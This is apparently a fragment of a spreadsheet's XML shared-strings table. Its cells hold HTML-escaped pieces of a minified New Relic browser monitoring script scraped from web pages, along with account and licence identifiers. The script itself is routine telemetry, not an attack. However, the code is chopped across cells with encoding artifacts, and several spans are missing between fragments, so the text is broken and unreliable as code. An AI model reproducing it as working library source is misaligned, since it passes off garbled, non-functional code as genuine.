&lt;script type="text/javascript" src="/common/js/search_foam.js"&gt;&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
&lt;/div&gt;&lt;!-- wrap end --&gt;_x005F_x000D_
	_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html lang="en-US" class="rebrand"&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;&lt;script type="text/javascript"&gt;(window. NREUM||(NREUM={})).init={privacy:{cookies_enabled:true},ajax:{deny_list:["bam.nr-data.net"]},distributed_tracing:{enabled:true}};(window.NREUM||(NREUM={})).loader_config={agentID:"1108364959",accountID:"3145821",trustKey:"3145821",xpid:"VwcDVF5RCRABVVFaBAcEVVcD",licenseKey:"NRJS-39d44ef454e56be9ba0",applicationID:"1108363332"};;(()=&gt;{var e,t,r={9071:(e,t,r)=&gt;{"use strict";r.d(t,{I:()=&gt;n});var n=0,i=navigator.userAgent.match(/Firefox[\/\s](\d+\.\d+)/);i&amp;&amp;(n=+i[1])},8768:(e,t,r)=&gt;{"use strict";r.d(t,{T:()=&gt;n,p:()=&gt;i});const n=/(iPad|iPhone|iPod)/g.test(navigator.userAgent),i=n&amp;&amp;Boolean("undefined"==typeof SharedWorker)},6562:(e,t,r)=&gt;{"use strict";r.d(t,{P_:()=&gt;g,Mt:()=&gt;v,C5:()=&gt;f,DL:()=&gt;y,OP:()=&gt;k,lF:()=&gt;L,Yu:()=&gt;E,Dg:()=&gt;p,CX:()=&gt;d,GE:()=&gt;w,sU:()=&gt;H});var n={};r.r(n),r.d(n,{agent:()=&gt;A,match:()=&gt;j,version:()=&gt;x});var i=r(6797),o=r(909),a=r(8610);class s{constructor(e,t){try{if(!e||"object"!=typeof e)return(0,a. Z)("New setting a Configurable requires an object as input");if(!t||"object"!=typeof t)return(0,a.</t>
  </si>
  <si>
    <t>Z)("Setting a Configurable requires a model to set its initial properties");Object.assign(this,t),Object.entries(e).forEach((e=&gt;{let[t,r]=e;const n=(0,o.q)(t);n.length&amp;&amp;r&amp;&amp;"object"==typeof r&amp;&amp;n.forEach((e=&gt;{e in r&amp;&amp;((0,a. Z)('"'.concat(e,'" is a protected attribute and can not be changed in feature ').concat(t,".   It will have no effect.</t>
  </si>
  <si>
    <t>")),delete r[e])})),this[t]=r}))}catch(e){(0,a. Z)("An error occured while setting a Configurable",e)}}}const c={beacon:i.ce.beacon,errorBeacon:i.ce.errorBeacon,licenseKey:void 0,applicationID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},u={};function f(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!u[e])throw new Error("Info for ".concat(e," was never set"));return u[e]}function d(e,t){if(!e)throw new Error("All info objects require an agent identifier!");u[e]=new s(t,c),(0,i.Qy)(e,u[e],"info")}const l={allow_bfcache:!0,privacy:{cookies_enabled:!0},ajax:{deny_list:void 0,enabled:!0,harvestTimeSeconds:10},distributed_tracing:{enabled:void 0,exclude_newrelic_header:void 0,cors_use_newrelic_header:void 0,cors_use_tracecontext_headers:void 0,allowed_origins:void 0},ssl:void 0,obfuscate:void 0,jserrors:{enabled:!0,harvestTimeSeconds:10},metrics:{enabled:!0},page_action:{enabled:!0,harvestTimeSeconds:30},page_view_event:{enabled:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1},session_trace:{enabled:!0,harvestTimeSeconds:10},spa:{enabled:!0,harvestTimeSeconds:10}},h={};function g(e){if(!e)throw new Error("All configuration objects require an agent identifier!");if(!h[e])throw new Error("Configuration for ".concat(e," was never set"));return h[e]}function p(e,t){if(!e)throw new Error("All configuration objects require an agent identifier!");h[e]=new s(t,l),(0,i.Qy)(e,h[e],"config")}function v(e,t){if(!e)throw new Error("All configuration objects require an agent identifier!");var r=g(e);if(r){for(var n=t.split(". "),i=0;i&lt;n.length-1;i++)if("object"!=typeof(r=r[n[i]]))return;r=r[n[n.length-1]]}return r}const m={accountID:void 0,trustKey:void 0,agentID:void 0,licenseKey:void 0,applicationID:void 0,xpid:void 0},b={};function y(e){if(!e)throw new Error("All loader-config objects require an agent identifier!");if(!b[e])throw new Error("LoaderConfig for ".concat(e," was never set"));return b[e]}function w(e,t){if(!e)throw new Error("All loader-config objects require an agent identifier!");b[e]=new s(t,m),(0,i.Qy)(e,b[e],"loader_config")}const E=(0,i.mF)().o;var A</t>
  </si>
  <si>
    <t>"),i=0;i&lt;n.length;i++)if(n[i]!==r[i])return!1;return!0}var N=r(5526),D=r(2374);const O="NRBA_SESSION_ID";function P(){if(!D.il)return null;try{let e;return null===(e=window.sessionStorage.getItem(O))&amp;&amp;(e=(0,N.ky)(16),window.sessionStorage.setItem(O,e)),e}catch(e){return null}}var R=r(8226);const C=e=&gt;({buildEnv:R.Re,customTransaction:void 0,disabled:!1,distMethod:R.gF,isolatedBacklog:!1,loaderType:void 0,maxBytes:3e4,offset:Math.floor(D._A?.performance?.timeOrigin||D._A?.performance?.timing?.navigationStart||Date.now()),onerror:void 0,origin:""+D._A.location,ptid:void 0,releaseIds:{},sessionId:1==v(e,"privacy.cookies_enabled")?P():null,xhrWrappable:"function"==typeof D._A.XMLHttpRequest?.prototype?.addEventListener,userAgent:n,version:R.q4}),I={};function k(e){if(!e)throw new Error("All runtime objects require an agent identifier!");if(!I[e])throw new Error("Runtime for ".concat(e," was never set"));return I[e]}function H(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");I[e]=new s(t,C(e)),(0,i.Qy)(e,I[e],"runtime")}function L(e){return function(e){try{const t=f(e);return!!t.licenseKey&amp;&amp;!!t.errorBeacon&amp;&amp;!!t.applicationID}catch(e){return!1}}(e)}},8226:(e,t,r)=&gt;{"use strict";r.d(t,{Re:()=&gt;i,gF:()=&gt;o,q4:()=&gt;n});const n="1.229.0",i="PROD",o="CDN"},9557:(e,t,r)=&gt;{"use strict";r.d(t,{w:()=&gt;o});var n=r(8610);const i={agentIdentifier:""};class o{constructor(e){try{if("object"!=typeof e)return(0,n.</t>
  </si>
  <si>
    <t>Z)("shared context requires an object as input");this.sharedContext={},Object.assign(this.sharedContext,i),Object.entries(e).forEach((e=&gt;{let[t,r]=e;Object.keys(i).includes(t)&amp;&amp;(this.sharedContext[t]=r)}))}catch(e){(0,n.Z)("An error occured while setting SharedContext",e)}}}},4329:(e,t,r)=&gt;{"use strict";r.d(t,{L:()=&gt;f,R:()=&gt;c});var n=r(3752),i=r(7022),o=r(4045),a=r(2325);const s={};function c(e,t){const r={staged:!1,priority:a.p[t]||0};u(e),s[e].get(t)||s[e].set(t,r)}function u(e){e&amp;&amp;(s[e]||(s[e]=new Map))}function f(){let e=arguments.length&gt;0&amp;&amp;void 0!==arguments[0]?arguments[0]:"",t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]?arguments[1]:"feature";if(u(e),!e||!s[e].get(t))return a(t);s[e].get(t).staged=!0;const r=Array.from(s[e]);function a(t){const r=e?n.ee.get(e):n.ee,a=o.X.handlers;if(r.backlog&amp;&amp;a){var s=r.backlog[t],c=a[t];if(c){for(var u=0;s&amp;&amp;u&lt;s.length;++u)d(s[u],c);(0,i. D)(c,(function(e,t){(0,i. D)(t,(function(t,r){r[0].on(e,r[1])}))}))}delete a[t],r.backlog[t]=null,r.emit("drain-"+t,[])}}r.every((e=&gt;{let[t,r]=e;return r.staged}))&amp;&amp;(r.sort(((e,t)=&gt;e[1].priority-t[1].priority)),r.forEach((e=&gt;{let[t]=e;a(t)})))}function d(e,t){var r=e[1];(0,i.</t>
  </si>
  <si>
    <t>D)(t[r],(function(t,r){var n=e[0];if(r[0]===n){var i=r[1],o=e[3],a=e[2];i.apply(o,a)}}))}},3752:(e,t,r)=&gt;{"use strict";r.d(t,{c:()=&gt;d,ee:()=&gt;u});var n=r(6797),i=r(3916),o=r(7022),a=r(6562),s="nr@context";let c=(0,n.fP)();var u;function f(){}function d(e){return(0,i. X)(e,s,l)}function l(){return new f}function h(){u.aborted=!0,u.backlog={}}c.ee?u=c.ee:(u=function e(t,r){var n={},c={},d={},g=!1;try{g=16===r.length&amp;&amp;(0,a.</t>
  </si>
  <si>
    <t>OP)(r).isolatedBacklog}catch(e){}var p={on:b,addEventListener:b,removeEventListener:y,emit:m,get:E,listeners:w,context:v,buffer:A,abort:h,aborted:!1,isBuffering:x,debugId:r,backlog: g?{}:t&amp;&amp;"object"==typeof t.backlog?t.backlog:{}};return p;function v(e){return e&amp;&amp;e instanceof f?e:e?(0,i. X)(e,s,l):l()}function m(e,r,n,i,o){if(!1!==o&amp;&amp;(o=!0),!u.aborted||i){t&amp;&amp;o&amp;&amp;t.emit(e,r,n);for(var a=v(n),s=w(e),f=s.length,d=0;d&lt;f;d++)s[d].apply(a,r);var l=T()[c[e]];return l&amp;&amp;l.push([p,e,r,a]),a}}function b(e,t){n[e]=w(e).concat(t)}function y(e,t){var r=n[e];if(r)for(var i=0;i&lt;r.length;i++)r[i]===t&amp;&amp;r.splice(i,1)}function</t>
  </si>
  <si>
    <t>w(e){return n[e]||[]}function E(t){return d[t]=d[t]||e(p,t)}function A(e,t){var r=T();p.aborted||(0,o. D)(e,(function(e,n){t=t||"feature",c[n]=t,t in r||(r[t]=[])}))}function x(e){return!!T()[c[e]]}function T(){return p.backlog}}(void 0,"globalEE"),c.ee=u)},9252:(e,t,r)=&gt;{"use strict";r.d(t,{E:()=&gt;n,p:()=&gt;i});var n=r(3752).ee.get("handle");function i(e,t,r,i,o){o?(o.buffer([e],i),o.emit(e,t,r)):(n.buffer([e],i),n.emit(e,t,r))}},4045:(e,t,r)=&gt;{"use strict";r.d(t,{X:()=&gt;o});var n=r(9252);o.on=a;var i=o.handlers={};function o(e,t,r,o){a(o||n. E,i,e,t,r)}function a(e,t,r,i,o){o||(o="feature"),e||(e=n.E);var a=t[o]=t[o]||{};(a[r]=a[r]||[]).push([e,i])}},8544:(e,t,r)=&gt;{"use strict";r.d(t,{bP:()=&gt;s,iz:()=&gt;c,m$:()=&gt;a});var n=r(2374);let i=!1,o=!1;try{const e={get passive(){return i=!0,!1},get signal(){return o=!0,!1}};n._A.addEventListener("test",null,e),n._A.removeEventListener("test",null,e)}catch(e){}function a(e,t){return i||o?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let r=arguments.length&gt;2&amp;&amp;void 0!==arguments[2]&amp;&amp;arguments[2];window.addEventListener(e,t,a(r))}function c(e,t){let r=arguments.length&gt;2&amp;&amp;void 0!==arguments[2]&amp;&amp;arguments[2];document.addEventListener(e,t,a(r))}},5526:(e,t,r)=&gt;{"use strict";r.d(t,{Ht:()=&gt;a,M:()=&gt;o,Rl:()=&gt;i,ky:()=&gt;s});var n=r(2374);function i(){var e=null,t=0,r=n._A?.crypto||n._A?.msCrypto;function i(){return e?15&amp;e[t++]:16*Math.random()|0}r&amp;&amp;r.getRandomValues&amp;&amp;(e=r.getRandomValues(new Uint8Array(31)));for(var o,a="xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx",s="",c=0;c&lt;a.length;c++)s+="x"===(o=a[c])?i().toString(16):"y"===o?(o=3&amp;i()|8).toString(16):o;return s}function o(){return s(16)}function a(){return s(32)}function s(e){var t=null,r=0,n=self.crypto||self.msCrypto;n&amp;&amp;n.getRandomValues&amp;&amp;Uint8Array&amp;&amp;(t=n.getRandomValues(new Uint8Array(31)));for(var i=[],o=0;o&lt;e;o++)i.push(a().toString(16));return i.join("");function a(){return t?15&amp;t[r++]:16*Math.random()|0}}},2053:(e,t,r)=&gt;{"use strict";function n(){return Math.round(performance.now())}r.d(t,{z:()=&gt;n})},6368:(e,t,r)=&gt;{"use strict";r.d(t,{e:()=&gt;o});var n=r(2374),i={};function o(e){if(e in i)return i[e];if(0===(e||"").indexOf("data:"))return{protocol:"data"};let t;var r=n._A?.location,o={};if(n.il)t=document.createElement("a"),t.href=e;else try{t=new URL(e,r.href)}catch(e){return o}o.port=t.port;var a=t.href.split("://");!o.port&amp;&amp;a[1]&amp;&amp;(o.port=a[1].split("/")[0].split("@").pop().split(":")[1]),o.port&amp;&amp;"0"!==o.port||(o.port="https"===a[0]?"443":"80"),o.hostname=t.hostname||r.hostname,o.pathname=t.pathname,o.protocol=a[0],"/"!==o.pathname.charAt(0)&amp;&amp;(o.pathname="/"+o.pathname);var s=!t.protocol||":"===t.protocol||t.protocol===r.protocol,c=t.hostname===r.hostname&amp;&amp;t.port===r.port;return o.sameOrigin=s&amp;&amp;(!t.hostname||c),"/"===o.pathname&amp;&amp;(i[e]=o),o}},8610:(e,t,r)=&gt;{"use strict";function n(e,t){console&amp;&amp;console.warn&amp;&amp;"function"==typeof console.warn&amp;&amp;(console.warn("New Relic: ".concat(e)),t&amp;&amp;console.warn(t))}r.d(t,{Z:()=&gt;n})},3916:(e,t,r)=&gt;{"use strict";r.d(t,{X:()=&gt;i});var n=Object.prototype.hasOwnProperty;function i(e,t,r){if(n.call(e,t))return e[t];var</t>
  </si>
  <si>
    <t>')})();function a(){return o}},7022:(e,t,r)=&gt;{"use strict";r.d(t,{D:()=&gt;i});var n=Object.prototype.hasOwnProperty;function i(e,t){var r=[],i="",o=0;for(i in e)n.call(e,i)&amp;&amp;(r[o]=t(i,e[i]),o+=1);return r}},2438:(e,t,r)=&gt;{"use strict";r.d(t,{P:()=&gt;o});var n=r(3752);const i=()=&gt;{const e=new WeakSet;return(t,r)=&gt;{if("object"==typeof r&amp;&amp;null!==r){if(e.has(r))return;e.add(r)}return r}};function o(e){try{return JSON.stringify(e,i())}catch(e){try{n.ee.emit("internal-error",[e])}catch(e){}}}},2650:(e,t,r)=&gt;{"use strict";r.d(t,{K:()=&gt;a,b:()=&gt;o});var n=r(8544);function i(){return"undefined"==typeof document||"complete"===document.readyState}function o(e,t){if(i())return e();(0,n.bP)("load",e,t)}function a(e){if(i())return e();(0,n.iz)("DOMContentLoaded",e)}},6797:(e,t,r)=&gt;{"use strict";r.d(t,{EZ:()=&gt;u,Qy:()=&gt;c,ce:()=&gt;o,fP:()=&gt;a,gG:()=&gt;f,mF:()=&gt;s});var n=r(2053),i=r(2374);const o={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net"};function a(){return i._A.NREUM||(i._A.NREUM={}),void 0===i._A.newrelic&amp;&amp;(i._A.newrelic=i._A.NREUM),i._A.NREUM}function s(){let e=a();return e.o||(e.o={ST:i._A.setTimeout,SI:i._A.setImmediate,CT:i._A.clearTimeout,XHR:i._A.XMLHttpRequest,REQ:i._A.Request,EV:i._A.Event,PR:i._A.Promise,MO:i._A.MutationObserver,FETCH:i._A.fetch}),e}function c(e,t,r){let i=a();const o=i.initializedAgents||{},s=o[e]||{};return Object.keys(s).length||(s.initializedAt={ms:(0,n.z)(),date:new Date}),i.initializedAgents={...o,[e]:{...s,[r]:t}},i}function u(e,t){a()[e]=t}function f(){return function(){let e=a();const t=e.info||{};e.info={beacon:o.beacon,errorBeacon:o.errorBeacon,...t}}(),function(){let e=a();const t=e.init||{};e.init={...t}}(),s(),function(){let e=a();const t=e.loader_config||{};e.loader_config={...t}}(),a()}},6998:(e,t,r)=&gt;{"use strict";r.d(t,{N:()=&gt;i});var n=r(8544);function i(e){let t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]&amp;&amp;arguments[1];return void(0,n.iz)("visibilitychange",(function(){if(t){if("hidden"!=document.visibilityState)return;e()}e(document.visibilityState)}))}},6408:(e,t,r)=&gt;{"use strict";r.d(t,{W:()=&gt;i});var n=r(2374);function i(){return"function"==typeof n._A?.PerformanceObserver}},8675:(e,t,r)=&gt;{"use strict";r.d(t,{t:()=&gt;n});const n=r(2325).D.ajax},8322:(e,t,r)=&gt;{"use strict";r.d(t,{A:()=&gt;i,t:()=&gt;n});const n=r(2325).D.jserrors,i="nr@seenError"},6034:(e,t,r)=&gt;{"use strict";r.d(t,{gF:()=&gt;o,mY:()=&gt;i,t9:()=&gt;n,vz:()=&gt;s,xS:()=&gt;a});const n=r(2325).D.metrics,i="sm",o="cm",a="storeSupportabilityMetrics",s="storeEventMetrics"},6486:(e,t,r)=&gt;{"use strict";r.d(t,{t:()=&gt;n});const n=r(2325).D.pageAction},2484:(e,t,r)=&gt;{"use strict";r.d(t,{Dz:()=&gt;i,OJ:()=&gt;a,qw:()=&gt;o,t9:()=&gt;n});const n=r(2325).D.pageViewEvent,i="firstbyte",o="domcontent",a="windowload"},6382:(e,t,r)=&gt;{"use strict";r.d(t,{t:()=&gt;n});const n=r(2325).D.pageViewTiming},2628:(e,t,r)=&gt;{"use strict";r.r(t),r.d(t,{ADD_EVENT_LISTENER:()=&gt;p,BST_RESOURCE:()=&gt;a,BST_TIMER:()=&gt;l,END:()=&gt;u,FEATURE_NAME:()=&gt;i,FN_END:()=&gt;d,FN_START:()=&gt;f,ORIG_EVENT:()=&gt;g,PUSH_STATE:()=&gt;h,RESOURCE:()=&gt;s,RESOURCE_TIMING_BUFFER_FULL:()=&gt;o,START:()=&gt;c});var n=r(6562);const i=r(2325).D.sessionTrace,o="resourcetimingbufferfull",a="bstResource",s="resource",c="-start",u="-end",f="fn"+c,d="fn"+u,l="bstTimer",h="pushState",g=n.Yu.EV,p="addEventListener"},755:(e,t,r)=&gt;{"use strict";r.r(t),r.d(t,{BODY:()=&gt;A,CB_END:()=&gt;x,CB_START:()=&gt;u,END:()=&gt;E,FEATURE_NAME:()=&gt;i,FETCH:()=&gt;_,FETCH_BODY:()=&gt;m,FETCH_DONE:()=&gt;v,FETCH_START:()=&gt;p,FN_END:()=&gt;c,FN_START:()=&gt;s,INTERACTION:()=&gt;l,INTERACTION_API:()=&gt;f,INTERACTION_EVENTS:()=&gt;o,JSONP_END:()=&gt;b,JSONP_NODE:()=&gt;g,JS_TIME:()=&gt;T,MAX_TIMER_BUDGET:()=&gt;a,REMAINING:()=&gt;d,SPA_NODE:()=&gt;h,START:()=&gt;w,originalSetTimeout:()=&gt;y});var n=r(6562);r(2374);const i=r(2325).D.spa,o=["click","submit","keypress","keydown","keyup","change"],a=999,s="fn-start",c="fn-end",u="cb-start",f="api-ixn-",d="remaining",l="interaction",h="spaNode",g="jsonpNode",p="fetch-start",v="fetch-done",m="fetch-body-",b="jsonp-end",y=n.Yu.</t>
  </si>
  <si>
    <t>ST,w="-start",E="-end",A="-body",x="cb"+E,T="jsTime",_="fetch"},1509:(e,t,r)=&gt;{"use strict";r.d(t,{W:()=&gt;s});var n=r(6562),i=r(3752),o=r(5432),a=r(6797);class s{constructor(e,t,r){this.agentIdentifier=e,this.aggregator=t,this.ee=i.ee.get(e,(0,n. OP)(this.agentIdentifier).isolatedBacklog),this.featureName=r,this.blocked=!1,this.checkConfiguration()}checkConfiguration(){if(!(0,n.lF)(this.agentIdentifier)){let e={...(0,a.gG)().info?.jsAttributes};try{e={...e,...(0,n. C5)(this.agentIdentifier)?.jsAttributes}}catch(e){}(0,o.j)(this.agentIdentifier,{...(0,a.gG)(),info:{...(0,a.gG)().info,jsAttributes:e}})}}}},5432:(e,t,r)=&gt;{"use strict";r.d(t,{j:()=&gt;w});var n=r(8683),i=r.n(n),o=r(2325),a=r(6562),s=r(9252),c=r(7022),u=r(3752),f=r(2053),d=r(4329),l=r(2650),h=r(2374),g=r(8610),p=r(6034);var v=r(6797);const m={stn:[o.</t>
  </si>
  <si>
    <t>D.sessionTrace],err:[o.D.jserrors,o.D.metrics],ins:[o. D.pageAction],spa:[o. D.spa]};const b={};function y(){const e=(0,v.gG)();["setErrorHandler","finished","addToTrace","inlineHit","addRelease","addPageAction","setCurrentRouteName","setPageViewName","setCustomAttribute","interaction","noticeError"].forEach((t=&gt;{e[t]=function(){for(var r=arguments.length,n=new Array(r),i=0;i&lt;r;i++)n[i]=arguments[i];return function(t){for(var r=arguments.length,n=new Array(r&gt;1?r-1:0),i=1;i&lt;r;i++)n[i-1]=arguments[i];let o=[];return Object.values(e.initializedAgents).forEach((e=&gt;{e.exposed&amp;&amp;e.api[t]&amp;&amp;o.push(e.api[t](...n))})),o.length&gt;1?returnsVals:o[0]}(t,...n)}}))}function w(e){let t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]?arguments[1]:{},n=arguments.length&gt;2?arguments[2]:void 0,w=arguments.length&gt;3?arguments[3]:void 0,{init:E,info:A,loader_config:x,runtime:T={loaderType:</t>
  </si>
  <si>
    <t>n},exposed:_=!0}=t;const S=(0,v.gG)();A||(E=S.init,A=S.info,x=S.loader_config),h.v6&amp;&amp;(A.jsAttributes={...A.jsAttributes,isWorker:!0}),(0,a. CX)(e,A),(0,a. Dg)(e,E||{}),(0,a.GE)(e,x||{}),(0,a.sU)(e,T),y();const j=function(e,t){t||(0,d.</t>
  </si>
  <si>
    <t>R)(e,"api");const n={};var v=u.ee.get(e),m=v.get("tracer"),b="api-",y=b+"ixn-";function w(){}(0,c. D)(["setErrorHandler","finished","addToTrace","inlineHit","addRelease"],(function(e,t){n[t]=A(b,t,!0,"api")})),n.addPageAction=A(b,"addPageAction",!0,o. D.pageAction),n.setCurrentRouteName=A(b,"routeName",!0,o.D.spa),n.setPageViewName=function(t,r){if("string"==typeof t)return"/"!==t.charAt(0)&amp;&amp;(t="/"+t),(0,a.</t>
  </si>
  <si>
    <t>OP)(e).customTransaction=(r||"http://custom.transaction")+t,A(b,"setPageViewName",!0,"api")()},n.setCustomAttribute=function(t,r){const n=(0,a.C5)(e);return(0,a. CX)(e,{...n,jsAttributes:{... n.jsAttributes,[t]:r}}),A(b,"setCustomAttribute",!0,"api")()},n.interaction=function(){return(new w).get()};var E</t>
  </si>
  <si>
    <t>Z)("Downloading runtime APIs failed...")))}return(0,c. D)("actionText,setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),(function(e,t){E[t]=A(y,t,void 0,o. D.spa)})),n.noticeError=function(e,t){"string"==typeof e&amp;&amp;(e=new Error(e)),(0,s.p)(p.xS,["API/noticeError/called"],void 0,o.</t>
  </si>
  <si>
    <t>D.metrics,v),(0,s.p)("err",[e,(0,f.z)(),!1,t],void 0,o. D.jserrors,v)},h.v6?x():(0,l.b)((()=&gt;x()),!0),n}(e,w);return(0,v.Qy)(e,j,"api"),(0,v.Qy)(e,_,"exposed"),(0,v.EZ)("activatedFeatures",b),(0,v. EZ)("setToken",(t=&gt;function(e,t){var r=u.ee.get(t);e&amp;&amp;"object"==typeof e&amp;&amp;((0,c.</t>
  </si>
  <si>
    <t>D)(e,(function(e,t){if(!t)return(m[e]||[]).forEach((t=&gt;{(0,s.p)("block-"+e,[],void 0,t,r)}));b[e]||((0,s.p)("feat-"+e,[],void 0,m[e],r),b[e]=!0)})),(0,d. L)(t,o.D.pageViewEvent))}(t,e))),j}},909:(e,t,r)=&gt;{"use strict";r.d(t,{Z:()=&gt;i,q:()=&gt;o});var n=r(2325);function i(e){switch(e){case n.D.ajax:return[n. D.jserrors];case n.D.sessionTrace:return[n.</t>
  </si>
  <si>
    <t>D.ajax,n.D.pageViewEvent];case n. D.pageViewTiming:return[n. D.pageViewEvent];default:</t>
  </si>
  <si>
    <t>return[]}}function o(e){return e===n. D.jserrors?[]:["auto"]}},2325:(e,t,r)=&gt;{"use strict";r.d(t,{D:()=&gt;n,p:()=&gt;i});const n={ajax:"ajax",jserrors:"jserrors",metrics:"metrics",pageAction:"page_action",pageViewEvent:"page_view_event",pageViewTiming:"page_view_timing",sessionTrace:"session_trace",spa:"spa"},i={[n.pageViewEvent]:1,[n.pageViewTiming]:2,[n.metrics]:3,[n.jserrors]:4,[n.ajax]:5,[n.sessionTrace]:6,[n.pageAction]:7,[n.spa]:8}},8683:e=&gt;{e.exports=function(e,t,r){t||(t=0),void 0===r&amp;&amp;(r=e?e.length:0);for(var n=-1,i=r-t||0,o=Array(i&lt;0?0: i);++n&lt;i;)o[n]=e[t+n];return o}}},n={};function</t>
  </si>
  <si>
    <t>i(e){var t=n[e];if(void 0!==t)return t.exports;var o=n[e]={exports:{}};return r[e](o,o.exports,i),o.exports}i.m=r,i.n=e=&gt;{var t=e&amp;&amp;e.__esModule?()=&gt;e.default:()=&gt;e;return i.d(t,{a:t}),t},i.d=(e,t)=&gt;{for(var r in t)i.o(t,r)&amp;&amp;!i.o(e,r)&amp;&amp;Object.defineProperty(e,r,{enumerable:!0,get:t[r]})},i.f={},i.e=e=&gt;Promise.all(Object.keys(i.f).reduce(((t,r)=&gt;(i.f[r](e,t),t)),[])),i.u=e=&gt;(({78:"page_action-aggregate",147:"metrics-aggregate",193:"session_trace-aggregate",317:"jserrors-aggregate",348:"page_view_timing-aggregate",439:"async-api",729:"lazy-loader",786:"page_view_event-aggregate",873:"spa-aggregate",898:"ajax-aggregate"}[e]||e)+". "+{78:"8658345c",147:"fde0a6c6",193:"afe7d95b",317:"265ba41e",348:"92e7c907",439:"71768fc8",729:"ff971c03",786:"a968183b",862:"5040a0e9",873:"6a952689",898:"ebcbd305"}[e]+"-1.229.0.min.js"),i.o=(e,t)=&gt;Object.prototype.hasOwnProperty.call(e,t),e={},t="NRBA:",i.l=(r,n,o,a)=&gt;{if(e[r])e[r].push(n);else{var s,c;if(void 0!==o)for(var u=document.getElementsByTagName("script"),f=0;f&lt;u.length;f++){var d=u[f];if(d.getAttribute("src")==r||d.getAttribute("data-webpack")==t+o){s=d;break}}s||(c=!0,(s=document.createElement("script")).charset="utf-8",s.timeout=120,i.nc&amp;&amp;s.setAttribute("nonce",i.nc),s.setAttribute("data-webpack",t+o),s.src=r),e[r]=[n];var l=(t,n)=&gt;{s.onerror=s.onload=null,clearTimeout(h);var i=e[r];if(delete e[r],s.parentNode&amp;&amp;s.parentNode.removeChild(s),i&amp;&amp;i.forEach((e=&gt;e(n))),t)return t(n)},h=setTimeout(l.bind(null,void 0,{type:"timeout",target:s}),12e4);s.onerror=l.bind(null,s.onerror),s.onload=l.bind(null,s.onload),c&amp;&amp;document.head.appendChild(s)}},i.r=e=&gt;{"undefined"!=typeof Symbol&amp;&amp;Symbol.toStringTag&amp;&amp;Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},i.p="https://js-agent.newrelic.com/",(()=&gt;{var e={971:0,241:0};i.f.j=(t,r)=&gt;{var n=i.o(e,t)?e[t]:void 0;if(0!==n)if(n)r.push(n[2]);else{var o=new Promise(((r,i)=&gt;n=e[t]=[r,i]));r.push(n[2]=o);var a=i.p+i.u(t),s=new Error;i.l(a,(r=&gt;{if(i.o(e,t)&amp;&amp;(0!==(n=e[t])&amp;&amp;(e[t]=void 0),n)){var o=r&amp;&amp;("load"===r.type?"missing":r.type),a=r&amp;&amp;r.target&amp;&amp;r.target.src;s.message="Loading chunk "+t+" failed.\n("+o+": "+a+")",s.name="ChunkLoadError",s.type=o,s.request=a,n[1](s)}}),"chunk-"+t,t)}};var t=(t,r)=&gt;{var n,o,[a,s,c]=r,u=0;if(a.some((t=&gt;0!==e[t]))){for(n in s)i.o(s,n)&amp;&amp;(i.m[n]=s[n]);if(c)c(i)}for(t&amp;&amp;t(r);u&lt;a.length;u++)o=a[u],i.o(e,o)&amp;&amp;e[o]&amp;&amp;e[o][0](),e[o]=0},r=window.webpackChunkNRBA=window.webpackChunkNRBA||[];r.forEach(t.bind(null,0)),r.push=t.bind(null,r.push.bind(r))})();var o={};(()=&gt;{"use strict";i.r(o);var e=i(2325),t=i(6562);const r=Object.values(e.D);function n(e){const n={};return r.forEach((r=&gt;{n[r]=function(e,r){return!1!==(0,t.</t>
  </si>
  <si>
    <t>Mt)(r,"".concat(e,".enabled"))}(r,e)})),n}var a=i(5432),s=i(909),c=i(9252),u=i(8768),f=i(4329),d=i(1509),l=i(2650),h=i(2374),g=i(8610);class p extends d.W{constructor(e,t,r){let n=!(arguments.length&gt;3&amp;&amp;void 0!==arguments[3])||arguments[3];super(e,t,r),this.hasAggregator=!1,this.auto=n,this.abortHandler,n&amp;&amp;(0,f.R)(e,r)}importAggregator(){if(this.hasAggregator||!this.auto)return;this.hasAggregator=!0;const e=async()=&gt;{try{const{lazyLoader:e}=await i.e(729).then(i.bind(i,8110)),{Aggregate:t}=await e(this.featureName,"aggregate");new t(this.agentIdentifier,this.aggregator)}catch(e){(0,g.Z)("Downloading ".concat(this.featureName," failed...")),this.abortHandler?.()}};h.v6?e():(0,l.b)((()=&gt;e()),!0)}}var v,m,b,y=i(2484),w=i(2053);class E extends p{constructor(r,n){let i=!(arguments.length&gt;2&amp;&amp;void 0!==arguments[2])||arguments[2];if(super(r,n,y.t9,i),("undefined"==typeof PerformanceNavigationTiming||u. T)&amp;&amp;"undefined"!=typeof</t>
  </si>
  <si>
    <t>PerformanceTiming){const n=(0,t. OP)(r);n[y. Dz]=Math.max(Date.now()-n.offset,0),(0,l.</t>
  </si>
  <si>
    <t>K)((()=&gt;n[y.qw]=Math.max((0,w.z)()-n[y. Dz],0))),(0,l.b)((()=&gt;{const t=(0,w.z)();n[y. OJ]=Math.max(t-n[y.</t>
  </si>
  <si>
